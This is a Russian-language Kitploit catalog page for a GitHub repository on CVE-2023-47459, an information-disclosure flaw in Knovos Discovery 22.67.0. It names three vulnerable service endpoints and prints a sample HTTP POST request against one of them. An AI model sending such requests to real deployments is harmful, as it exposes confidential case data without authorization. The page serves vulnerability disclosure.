Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-47459 | Kitploit
Инструменты/GitHubGitHub/aleksey-vi/cve-2023-47459
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubaleksey-vi/cve-2023-47459

CVE-2023-47459

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-47459

Описание

В продукте Knovos Discovery v.22.67.0 обнаружена уязвимость, которая позволяет удалённому злоумышленнику получить доступ к конфиденциальной информации, используя компоненты:
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName, /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation и /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport.

Тип уязвимости

Трассировка стека / Раскрытие информации

Производитель продукта

Knovos Discovery

Затронутая кодовая база продукта

Версия 22.67.0 - Версия 22.67.0

Затронутый компонент

/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport

Тип атаки

Удалённая

Влияние на выполнение кода

true

Влияние на раскрытие информации

true

Исследователь

  • Aleksey Vistorobskiy

Векторы атаки

авторизованный пользователь

root@kitploit:~
POST /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close

{
	"Id": id
}

Ссылки

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47459
Скачать инструмент